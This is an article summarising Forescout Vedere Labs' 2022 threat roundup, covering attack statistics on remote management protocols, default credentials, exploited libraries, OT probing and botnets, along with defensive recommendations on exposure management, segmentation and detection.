Rapid digitization means that organizations are now more connected than ever. Most organizations now host a combination of interconnected IT, OT, IoT and sometimes IoMT devices in their networks, which has increased their attack surface. Forescout’s data shows that around 24% of connected devices in every organization are no longer traditional IT.
What are the key highlights of Forescout’s data?
The growing number and diversity of connected devices in every industry presents a set of new challenges for organizations and companies in understanding and managing their general risk exposure. In brief, we have entered a new era of mixed IT/IoT threats, with cyberattacks and cybercrime around the world growing in intensity, sophistication, and frequency as well.
The adoption of new connected devices in 2023 is likely to pose even greater challenges for cybersecurity professionals across the globe. To help organizations and companies of all sizes prepare, Forescout’s Vedere Labs has analyzed information and data gathered in 2022 about cyberattacks, crime, exploits and malware and shared insights in our 2022 Threat Roundup.
Excerpted below are findings and insights for defenders, a brief outlook based on observations, and strategic recommendations on how to protect your environment from the evolving threat landscape. For a detailed analysis of the attacks, exploits and malware observed in 2022, including a technical deep dive into endemic and emerging malware threats.
What are the key findings and insights for defenders?
Here are takeaways and corresponding actions your organisation can take to help prevent and mitigate the types of cyberattacks we observed in 2022, a few cyber hygiene best practices.
The top 10 countries account for 73% of malicious traffic
In these countries, attackers rely on legitimate hosting providers (81% of attacks), but also leverage bulletproof hosting and compromised hosts on consumer and business networks.
Some countries of origin carry notoriously risky traffic, for example, Russia and China. If your organization does not do business with, or in, a particular country, then blocking those IP ranges can help you to reduce all the noise. However, judging IP addresses based solely on country of origin may be ineffective, since many of the attacks originate from American, European, and Asian countries that would hardly look suspicious on a corporate network.
Autonomous systems (ASs) are a better sign of risk than the particular country of origin, since they are way more specific. IPs belonging to known bulletproof hosting (BPH) providers and organizations that do not promptly respond to abuse complaints should be treated with care.
On the other hand, your own network may be the victim of abuse right now, as we speak by malicious actors using it for further cybercriminal attacks. Pay attention to all the outbound communications that may seem suspicious, even if they are targeting known benign addresses. Subscribing to threat feeds can also help you to detect compromises in your own network.
Remote management protocols are the top target for initial access
These are at (43%), followed by web attacks (26%), and attacks on remote storage protocols (23%). (These statistics stated above do not account for phishing, which is a very popular method, arguably the most popular for initial access but is not captured by our honeypots.)
Some services are naturally more complex to defend because they must by nature be exposed on the internet, such as web and email servers. However, unnecessary services often end up being exposed, too – and they may be easy targets for exploitation. To minimize exposure:
- Inventory every device that has an exposed management protocol or database service.
- Disable those that are not required and focus on hardening the ones that still need to be exposed by requiring VPN connections were appropriate.
Adopting appropriate and effective security solutions such as web application firewalls (WAFs) and host or network intrusion prevention systems (IPSs), as well as effective architectural choices such as DMZs and network segmentation, also helps us reduce the risk significantly.
Many attacks on these protocols rely on weak or default credentials
Popular and generic usernames (such as “root” and “admin”) account for 87% of attempts, but the other 13% include dozens of highly specific usernames for applications and most devices.
Accounts for specific services are being scanned all the time, so make sure to change all the default usernames and passwords whenever it is possible. Try to use complex, unique passwords for every single service on every device. Rotate credentials at a regular interval to avoid the leaked credentials remaining valid. Finally, enable two-factor authentication for apps.
Exploits are not limited to traditional applications
Three-quarters (which is about 76%) of exploits target online software libraries like Log4j, OpenSSH and TCP/IP stacks. Other popular targets include exposed services, such as databases, web applications/servers and email servers, as well as internet-facing network infrastructure, such as firewalls and routers. It is important to note that the vulnerabilities used by opportunistic attackers are also employed by a few sophisticated state-sponsored actors.
When deciding which vulnerabilities to patch and when, focus not only on CVSS and other severity metrics, but also consider the vulnerabilities that are actually being exploited by these cybercriminals. CISA keeps an up-to-date catalogue of known exploited vulnerabilities, which is a valuable resource for organizations and companies of all sizes to keep alert and aware.
Out of all these vulnerabilities, the ones affecting software components are the most difficult to eradicate because of their devious tendency to trickle down the supply chain. This is especially true for open-source components. When a vulnerability cannot be patched or fixed on all devices in the entire network, a risk assessment and mitigation plan including segmentation as well as close network monitoring is the best approach for most organizations.
Besides focusing on the most exploited vulnerabilities for patching and fixing, it is important to know the vulnerabilities that are being exploited at a certain point in time to enable focused threat hunting exercises on a network, looking for any signs of what is popular at that time.
Critical infrastructure is a constant target
We have observed exploits for specific devices but also constant enumeration of popular OT protocols, including those used in industrial automation, building automation and utilities.
Monitoring the traffic to and from OT devices is nowadays as critical as monitoring IT traffic. Attackers are constantly probing these devices for weaknesses and many organizations and companies will be blind to that because they believe that they don’t have OT assets to protect. The truth is that building automation and even protocols such as Modbus for industrial automation are now found in almost every organization and are a target for attackers.
95% of post-exploitation activities related to discovery of further data
It was noticed that the persistence and the execution of further commands or information are also very common, including the removal of all the artifacts related to existing rival malware.
Even after an initial breach, threat actors and criminals need to spend time getting situated in the target system, downloading further tools, executing them and persisting. Many of these actions provide more chances for detection and response, provided that proper endpoint introspection capabilities are available, which is a notorious problem on non-IT endpoints.
The most common malware observed
Most common malware observed; Ransomware (53%), botnets (25%) and cryptominers (7%). Large active botnet campaigns, such as Dota3, represent almost 90% of the IPs we observe dropping malware. Some malware remains endemic (such as WannaCry and Mirai variants). Emerging botnets (such as Chaos) are starting to cross the boundaries between IoT and IT.
Malware hashes are insufficient as IoCs because some malware is polymorphic, which means its hash is unique for each new cybercrime victim on the internet. Therefore, it is better to also detect and hunt for TTPs and anomalous behaviour as opposed to relying solely on IoCs.
What are the Vedere Labs findings on IT and IoT?
In 2022 Vedere Labs observed many open-source botnets; that is, botnets that use malware whose source code is available on Github or has been leaked and widely publicised. They can be quickly customised by inexperienced malware developers and used for their own purposes.
Relying on shared or leaked code, IoT botnets have gradually evolved from the brute-forcing Telnet credentials to exploiting a large number of CVEs, with the advantage that exploits do last longer, and that the persistent malware is harder to remove on IoT devices than in IT.
The Chaos botnet is one of the latest developments in this long line of botnet evolution, but it definitely won’t be the last one. With its lateral movement and exploitation capabilities, Chaos could easily be used to drop ransomware or other malware instead of cryptominers and DDoS.
Cybercriminals are after money. 2022, Forescout’s Vedere Labs developed R4IoT, a proof-of-concept that showed how IoT devices act as entry points for IT and OT ransomware attacks.
At the time, we assumed that the initial IoT attack – an exploit on an IP camera or NAS – would be carried out manually either by a ransomware group or by relying on an intermediary such as an IAB. After reviewing the 2022 data and information, we realize that a new wave of botnets has opened the doors to such an attack being carried out as part of an automated campaign.
What are the recommended three pillars of cybersecurity?
As the threat landscape continues to evolve and more organizations adopt cybersecurity not only for endpoints but also for the growing number of unsecured IoT devices, threat actors have consistently moved to devices that offer much easier entry points. In order to protect your environment, we recommend that organizations focus on three key pillars of cybersecurity:
- Risk and exposure management. Start by identifying every asset connected to the network and its security posture, including known vulnerabilities, credentials and open ports. Forescout also recommends mapping your environment to a security framework such as CIS. Then, change the default “easily guessable” credentials and use strong, unique passwords for each device.
Next, unused services should be disabled and all the vulnerabilities should be patched to prevent exploitation. With your attack surface understood, you can now fully assess risk in your environment. Finally, focus on mitigating the use of a risk-based approach. Use automated controls that do not rely only on security agents and also apply to the whole enterprise instead of silos like the IT network, the OT network, or specific types of IoT devices.
- Network security. Do not expose unmanaged devices directly on the internet, with very few exceptions such as routers and firewalls. Segment the network to isolate IT, IoT and OT devices, limiting network connections to only specifically allowed management and engineering workstations or among unmanaged devices that need to communicate.
This kind of segmentation shouldn’t happen only between IT and OT, but even within IT and OT networks to prevent all kinds of lateral movement and data exfiltration. Ensure to restrict external communication paths and ensure that you isolate or contain vulnerable devices in zones as a mitigating control if they cannot be patched or until they can all be patched.
- Threat detection and response. Use an IoT/OT-aware, DPI-capable monitoring solution to alert on malicious indicators and behaviors, watching internal systems and communications for known hostile actions such as vulnerability exploitation, password guessing and unauthorized use of OT protocols. Anomalous and malformed traffic should be blocked, or at least alert its presence to network operators.
Extended detection and response (XDR) solutions are an important consideration. They collect telemetry and logs from various sources; including security tools, applications, infrastructure, cloud and other enrichment sources; correlate attack signals to generate high-fidelity threats for analyst investigation; and also enable automated response actions across the enterprise.
